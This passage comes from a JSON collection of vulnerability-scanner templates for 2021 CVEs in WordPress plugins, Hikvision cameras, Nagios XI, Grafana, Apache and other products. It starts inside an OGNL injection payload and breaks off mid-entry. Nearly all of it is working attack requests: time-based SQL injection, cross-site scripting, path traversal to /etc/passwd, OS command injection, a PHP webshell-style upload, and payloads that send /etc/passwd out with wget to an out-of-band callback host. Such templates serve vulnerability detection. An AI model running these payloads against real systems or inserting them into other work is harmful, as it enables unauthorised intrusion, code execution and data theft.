+\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 - Mod_Proxy SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-36260","info":{"name":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical"},"requests":[{"raw":["PUT /SDK/webLanguage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><language>$(cat /etc/passwd>webLib/x)</language>\n","GET /x HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-33221","info":{"name":"CommScope Ruckus IoT Controller - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service/v1/service-details"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["message","ok","data","dns","gateway"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"req-condition":true,"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-27314","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&password=test&submit=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Doctor Appoinment System\")"],"condition":"and"}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-24499","info":{"name":"WordPress Workreap - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9\nX-Requested-With: XMLHttpRequest\n\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"action\"\n\nworkreap_award_temp_file_uploader\n-----------------------------cd0dc6bdc00b1cf9\nContent-Disposition: form-data; name=\"award_img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-httpd-php\n\n<?php echo md5(\"CVE-2021-24499\"); ?>\n-----------------------------cd0dc6bdc00b1cf9--\n","GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["71abe5077dae2754c36d731cc1534d4d"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24762","info":{"name":"WordPress Perfect Survey<1.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=4"]},{"type":"word","part":"header","words":["wp-ps-session"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open 